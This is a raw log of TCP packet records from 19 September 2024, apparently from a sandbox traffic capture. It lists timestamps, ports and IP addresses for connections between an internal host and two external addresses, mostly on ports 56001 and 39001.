Sep 19, 2024 02:41:48.691385031 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.691402912 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.691570044 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:49.254457951 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:49.432182074 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:49.432363987 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:49.434053898 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:49.603667021 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:41:49.650376081 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:41:49.666891098 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:49.667058945 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:49.775054932 CEST	49846	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:49.852880001 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:49.853959084 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:50.078938007 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:50.079899073 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:50.123611927 CEST	39001	49846	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:50.125027895 CEST	49846	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:50.312112093 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:50.325588942 CEST	39001	49846	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:50.326920033 CEST	49846	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:50.327049971 CEST	49846	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:50.432195902 CEST	49848	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:50.504184008 CEST	39001	49846	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:50.607888937 CEST	39001	49848	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:50.609128952 CEST	49848	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:51.661081076 CEST	49848	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:51.834717035 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:51.853643894 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:51.853646040 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:51.853646994 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:51.853646994 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:51.853647947 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:51.853648901 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:51.854022026 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:51.854023933 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:51.854024887 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:51.854024887 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:51.854964972 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:51.855062008 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:51.855309963 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:51.855406046 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:51.877305031 CEST	39001	49848	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:51.878174067 CEST	49848	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.031596899 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.031661987 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.031708002 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.031781912 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.031897068 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.031905890 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.031948090 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.031961918 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.032130957 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.032159090 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.032211065 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.032321930 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.032345057 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.032377958 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.032407045 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.032458067 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.032495022 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.032567024 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.032589912 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.032655954 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.032668114 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.032727957 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.032795906 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.032907963 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.032936096 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.032958984 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.032979965 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.033030033 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.033104897 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.033183098 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.095932961 CEST	39001	49848	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.099425077 CEST	39001	49848	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.100486994 CEST	49848	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.100641966 CEST	49848	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.210217953 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.210220098 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.210982084 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.210983992 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.210984945 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.210985899 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.210987091 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.210987091 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.210988045 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.210988998 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.210989952 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.210990906 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.211169004 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.211169958 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.211360931 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.211363077 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.211364031 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.211611032 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.211740017 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.211741924 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.211819887 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.211961985 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.212116957 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.212117910 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.212119102 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.212120056 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.212121010 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.212121964 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.212121964 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.212122917 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.212124109 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.212125063 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.212275028 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.212676048 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.212677002 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.212677956 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.212678909 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.212680101 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.212680101 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.212681055 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.212682009 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.212860107 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.213011980 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.213012934 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.213013887 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.213148117 CEST	49849	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.213314056 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.213794947 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.213938951 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.214334011 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.214561939 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.280572891 CEST	39001	49848	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389204979 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389206886 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389208078 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389208078 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389209032 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389209986 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389210939 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389210939 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389211893 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389971018 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389972925 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389974117 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389975071 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389976025 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389976978 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389976978 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389977932 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389978886 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389980078 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389981031 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389981985 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389982939 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389982939 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389983892 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389985085 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389986038 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389986992 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389987946 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389987946 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389988899 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389990091 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389991045 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389991045 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389991999 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389992952 CEST	39001	49849	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.389993906 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390158892 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390160084 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390208960 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.390376091 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.390721083 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390722990 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390722990 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390723944 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390724897 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390726089 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390727043 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390727997 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390728951 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390728951 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390729904 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390731096 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390732050 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390733004 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390733957 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390734911 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390794039 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.390872002 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.390872002 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.390888929 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390889883 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390891075 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390892029 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390892982 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390893936 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390894890 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390896082 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390897036 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.390897989 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.391053915 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.391199112 CEST	49849	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.391638041 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.391913891 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.391915083 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.391916037 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.391916990 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.391917944 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.391918898 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.391920090 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.391921043 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.391921997 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.391921997 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.391922951 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.391923904 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.391925097 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.392076969 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.392127037 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.392127037 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.392302036 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.392874002 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.392951965 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.569336891 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.569339991 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.569910049 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.569911957 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.569911957 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.569912910 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.569914103 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.569914103 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.570569992 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.570866108 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.570868015 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.570869923 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.570869923 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.570871115 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.570872068 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.570873022 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.570873022 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.570873976 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.570874929 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.570875883 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.571002960 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.571054935 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.571223974 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.571224928 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.571225882 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.571227074 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.571595907 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.571597099 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.571598053 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.571598053 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.571599007 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.572197914 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.572249889 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.572328091 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.572722912 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.572725058 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.572726011 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.572726965 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.572726965 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.572727919 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.572729111 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.572729111 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.572730064 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.572730064 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.572731018 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.572731018 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.572731972 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.572732925 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.572808981 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.573026896 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.573805094 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.573807001 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.573807001 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.573807955 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.573808908 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.573808908 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.573810101 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.573810101 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.573811054 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.573812008 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.573812008 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.573812962 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.573812962 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.573822975 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.573901892 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.574062109 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.574712992 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.574714899 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.574714899 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.574716091 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.574717045 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.574717999 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.574717999 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.574718952 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.574718952 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.574719906 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.574719906 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.574721098 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.575244904 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.575246096 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.575247049 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.575247049 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.575248003 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.575248003 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.575248957 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.575249910 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.575423002 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.575566053 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.575818062 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.575819969 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.575819969 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.575820923 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.575822115 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.575823069 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.576006889 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.576085091 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.576162100 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.576163054 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.576164007 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.576164961 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.576165915 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.576273918 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.576344967 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.576873064 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.576874971 CEST	56001	49847	45.11.229.96	192.168.11.30
